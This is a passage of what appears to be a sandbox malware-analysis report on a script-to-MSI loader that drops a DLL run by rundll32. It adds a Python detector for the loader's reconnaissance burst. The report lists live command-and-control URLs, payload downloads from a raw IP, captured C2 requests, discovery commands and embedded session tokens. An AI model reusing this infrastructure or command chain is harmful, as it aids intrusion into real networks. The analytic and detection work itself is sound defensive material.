Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005BB02D FindFirstFileExW,FindNextFileW,FindClose,FindClose, 3_2_005BB02D
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CEA350 FindFirstFileW,FindNextFileW,LoadLibraryW, 5_2_00000235B5CEA350
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 5_2_00000235B5CE1A08
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010316604 FindFirstFileA,FindNextFileA, 6_3_0000018010316604
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103116F4 FindFirstFileW,FindNextFileW, 6_3_00000180103116F4
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532BA350 FindFirstFileW,FindNextFileW,LoadLibraryW, 7_2_000001EF532BA350
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 7_2_000001EF532B1A08
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCache\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\
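The net view launches above are one slice of a larger discovery burst: the string decryptor in the AV Detection section recovered the full set of cmd.exe /c command lines (ipconfig /all, systeminfo, nltest /domain_trusts, net view /all [/domain], net group "Domain Admins" /domain, wmic ... AntiVirusProduct, net config workstation, whoami /groups), each driven by the rundll32.exe process hosting the dropped DLL. Any one of those commands is routine for an administrator; all of them from the same parent inside a couple of minutes is not. The block below is an added example, not from the report or from any detection product, that scores that burst over constructed Sysmon-style process-creation events. The rundll32 command line in the sample mirrors the report's "rundll32.exe %s,%s" pattern and its Update_cd47bedf.dll drop path; the export name "run" is a placeholder, since the report does not name it.

```python
"""
Added example (not from the report or from any detection product): flags the
discovery burst described by the decrypted strings when it shows up in
process-creation telemetry, grouping cmd.exe launches by their parent process.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# One pattern per discovery command the string decryptor recovered. An admin may run
# one or two of these by hand; the loader runs the whole set back to back.
RECON_PATTERNS = {
    "ipconfig_all":  re.compile(r"\bipconfig(\.exe)?\s+/all\b", re.I),
    "systeminfo":    re.compile(r"\bsysteminfo(\.exe)?\b", re.I),
    "domain_trusts": re.compile(r"\bnltest(\.exe)?\s+/domain_trusts\b", re.I),
    "net_view_all":  re.compile(r"\bnet(1|\.exe)?\s+view\s+/all\b", re.I),
    "net_group_da":  re.compile(r'\bnet(1|\.exe)?\s+group\s+"domain admins"', re.I),
    "wmic_av":       re.compile(r"securitycenter2.*antivirusproduct", re.I),
    "net_config_ws": re.compile(r"\bnet(1|\.exe)?\s+config\s+workstation\b", re.I),
    "whoami_groups": re.compile(r"\bwhoami(\.exe)?\s+/groups\b", re.I),
}

# Drop locations from this report. A rundll32.exe parent loading one of them turns
# a medium-confidence recon alert into a high-confidence one.
SUSPICIOUS_PARENT = re.compile(
    r"\\AppData\\(Roaming\\Custom_update\\Update_[0-9a-f]+\.dll"
    r"|Local\\sharepoint\\360total\.dll)", re.I)


def find_recon_bursts(events: List[dict], window: timedelta = timedelta(minutes=2),
                      min_distinct: int = 4) -> List[dict]:
    """Return one alert per parent process that drives at least `min_distinct`
    different discovery commands through cmd.exe inside `window`."""
    by_parent: Dict[Tuple[str, int], List[dict]] = defaultdict(list)
    for ev in events:
        if ev["image"].lower().endswith("\\cmd.exe"):
            by_parent[(ev["host"], ev["ppid"])].append(ev)

    alerts = []
    for (host, ppid), evs in by_parent.items():
        evs.sort(key=lambda e: e["ts"])
        for start in range(len(evs)):
            t0 = datetime.fromisoformat(evs[start]["ts"])
            seen: Dict[str, str] = {}
            for ev in evs[start:]:
                if datetime.fromisoformat(ev["ts"]) - t0 > window:
                    break
                for name, rx in RECON_PATTERNS.items():
                    if rx.search(ev["cmdline"]):
                        seen.setdefault(name, ev["cmdline"])
            if len(seen) >= min_distinct:
                parent_cmd = evs[start]["parent_cmdline"]
                alerts.append({
                    "host": host,
                    "parent_pid": ppid,
                    "parent_cmdline": parent_cmd,
                    "recon": sorted(seen),
                    "severity": "high" if SUSPICIOUS_PARENT.search(parent_cmd) else "medium",
                })
                break  # one alert per parent is enough
    return alerts


def _ev(ts, host, pid, ppid, cmdline, parent_cmdline,
        image=r"C:\Windows\System32\cmd.exe"):
    return {"ts": ts, "host": host, "pid": pid, "ppid": ppid, "image": image,
            "cmdline": cmdline, "parent_cmdline": parent_cmdline}


# Constructed Sysmon-style events. The rundll32 command line mirrors the report's
# "rundll32.exe %s,%s" pattern and Update_cd47bedf.dll drop; the export name "run"
# is a placeholder, the report does not name it.
LOADER = (r"C:\WINDOWS\SYSTEM32\rundll32.exe "
          r"C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll,run")
SAMPLE_EVENTS = [
    # benign: a single ipconfig from an explorer-launched prompt
    _ev("2024-04-26T21:00:00", "WS01", 4000, 1200, "cmd.exe /c ipconfig /all",
        r"C:\Windows\explorer.exe"),
    # loader chain: one rundll32 parent (pid 5120) running the whole set in a minute
    _ev("2024-04-26T21:05:00", "WS01", 5200, 5120, "cmd.exe /c ipconfig /all", LOADER),
    _ev("2024-04-26T21:05:03", "WS01", 5204, 5120, "cmd.exe /c systeminfo", LOADER),
    _ev("2024-04-26T21:05:09", "WS01", 5210, 5120, "cmd.exe /c nltest /domain_trusts", LOADER),
    _ev("2024-04-26T21:05:12", "WS01", 5216, 5120, "cmd.exe /c net view /all /domain", LOADER),
    _ev("2024-04-26T21:05:15", "WS01", 5222, 5120,
        'cmd.exe /c net group "Domain Admins" /domain', LOADER),
    _ev("2024-04-26T21:05:20", "WS01", 5230, 5120,
        r"cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path "
        "AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName "
        "|| echo No Antivirus installed", LOADER),
    _ev("2024-04-26T21:05:24", "WS01", 5238, 5120, "cmd.exe /c whoami /groups", LOADER),
]

if __name__ == "__main__":
    for alert in find_recon_bursts(SAMPLE_EVENTS):
        print(alert)
```

Keying on the parent process rather than on the host alone is what keeps the single benign ipconfig out of the alert: the loader's children share a parent pid, an administrator's ad-hoc commands usually do not.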

Networking

Source: C:\Windows\System32\rundll32.exe Network Connect: 104.21.46.75 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.197.34 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.219.28 443
Source: Malware configuration extractor URLs: https://jarinamaers.shop/live/
Source: Malware configuration extractor URLs: https://startmast.shop/live/
Source: global traffic HTTP traffic detected:
    POST /OneCollector/1.0/ HTTP/1.1
    Accept: */*
    APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521
    AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAEJanOM/f8BEauEo6GRqguxLgAJt0LBh1uWaBD08sPTthnLouxyOeqq8UXC40zxYtXUeuLL3jc98oc4sgTt8Qg5RgpVyPUGOqQCdIMU+jHj5jPNgpCOYLzgjk7/68jQbYqRpL5buJGDaKHJUU4Qzi5sjC1iwUwrkBZLfklCNSWdGai+iykzR0ELnFD4lJb88vZch+TXuihcRzjbZvJG6mFONQPa3ignNQpsSbQgkMM4xuASI/kaIM+YTU5dBQE1SH8k0CwZj5Yc3H1S94NyGSn+DeuALqccEE8gt3uchW9hnkYs9tmlAQt7GBc9BBk/kSpz+oHgE=&p=
    Client-Id: NO_AUTH
    Content-Encoding: deflate
    Content-Type: application/bond-compact-binary
    Expect: 100-continue
    SDK-Version: EVT-Windows-C++-No-3.4.15.1
    Upload-Time: 1714166482925
    Host: self.events.data.microsoft.com
    Content-Length: 7981
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE8D90 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 5_2_00000235B5CE8D90
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGLizsLEGIjAYi0E5THM4aIj8FUOrJpdUpPAhU1RG5ebUtVLBNvumYZ4qVuqJu7WbwqMCr0qqjPIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-21; NID=513=ik1S2gvbzXRLjVdx_Y5LJh0w0S_9_5d6ElFayBg60ugD7-6XcInlKtnDSWxvnZdc6RsT5sEwwdujmxNFQp8EP2ZapVOyxYy_Jrmtb15X64AkKhQiB3isKEgC-YcetiMg65hoSKrHKE1skUTiedEtj1AIYbPY_8XEjWEE9T0CDLM
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGLizsLEGIjBzxD8y3zpVM4rvYXOzD0wZHGfxDV2C93K9X3HWoqlaBUqfM3Uck6U5jewh4t8bDhoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-21; NID=513=UowfF3gRb-VEPPE7VIYxDTZwjoWg8ud9RDcXC8lTIuA_racxo5lcoiIPCNawi8P-2VoGw5HUUmmcSiDTYaOtK75Zr8F2x6a3xTaKMIWLcX8zMSUJcARngZXAUOfcFD7ay0O3J-Bpq4ODfH4oORUkZCP-9pENI39m6kruvf_I5S4
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=yd82sCgS4VfmnpY&MD=lpuKpd3X HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=yd82sCgS4VfmnpY&MD=lpuKpd3X HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shop
Source: global traffic HTTP traffic detected: GET /neo.msi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows InstallerHost: 146.19.106.236
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: jarinamaers.shop
Source: global traffic DNS traffic detected: DNS query: grizmotras.com
Source: global traffic DNS traffic detected: DNS query: pewwhranet.com
Source: unknown HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache
Source: rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr String found in binary or memory: ftp://ftp%2desktop.ini
Source: wscript.exe, 00000000.00000003.1722027817.0000023BEBD7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1632760730.0000023BEBE71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1723783765.0000023BEBD59000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1633247364.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634073325.0000023BEC085000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1632650735.0000023BEBEE5000.00000004.00000020.00020000.00000000.sdmp, Document_a51_19i793302-14b09981a5569-3684u8.js String found in binary or memory: http://146.19.106.236/neo.msi
Source: ~DF41638D872A10A065.TMP.1.dr String found in binary or memory: http://146.19.106.236/neo.msi-995103104311030230
Source: ~DFA850122BA55067CF.TMP.1.dr, ~DFF122760D5CC42A2E.TMP.1.dr, ~DFA3E2CC6CAB1B816A.TMP.1.dr, inprogressinstallinfo.ipi.1.dr, ~DF2C17C88212509880.TMP.1.dr, ~DF61773DAED613FFB9.TMP.1.dr String found in binary or memory: http://146.19.106.236/neo.msi0
Source: wscript.exe, 00000000.00000002.1723806957.0000023BEBD70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.di
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634223514.0000023BEC442000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC4B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1724068170.0000023BEC440000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC4B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wscript.exe, 00000000.00000002.1723997016.0000023BEC072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721591141.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesi
Source: wscript.exe, 00000000.00000002.1723806957.0000023BEBD70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digic
Source: wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634223514.0000023BEC442000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC4B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1724068170.0000023BEC440000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC4B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wscript.exe, 00000000.00000003.1640046854.0000023BEC499000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1724068170.0000023BEC499000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/ennu
Source: rundll32.exe String found in binary or memory: http://dr.f.360.cn/scan
Source: rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr String found in binary or memory: http://dr.f.360.cn/scanlist
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC4B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634223514.0000023BEC442000.00000004.00000020.00020000.00000000.sdmp, MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC4B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1723806957.0000023BEBD70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1724068170.0000023BEC440000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: wscript.exe, 00000000.00000002.1723997016.0000023BEC072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721591141.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/gsgccr4X)
Source: rundll32.exe String found in binary or memory: http://pconf.f.360.cn/safe_update.php
Source: rundll32.exe String found in binary or memory: http://pscan.f.360.cn/safe_update.php
Source: rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr String found in binary or memory: http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie
Source: rundll32.exe String found in binary or memory: http://sconf.f.360.cn/client_security_conf
Source: wscript.exe, 00000000.00000002.1723997016.0000023BEC072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721591141.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign
Source: wscript.exe, 00000000.00000002.1723997016.0000023BEC072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721591141.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign)
Source: wscript.exe, 00000000.00000003.1640046854.0000023BEC4A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/;
Source: wscript.exe, 00000000.00000003.1639949100.0000023BEC4BB000.00000004.00000020.00020000.00000000.sdmp, C5C8CC0A7FE31816B4641D04654025600.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0u
Source: wscript.exe, 00000000.00000003.1721307435.0000023BEBC71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1723783765.0000023BEBD59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crtY
Source: wscript.exe, 00000000.00000003.1640046854.0000023BEC499000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com:80/cacert/codesigningrootr45.crtdXl
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://t2.symcb.com0
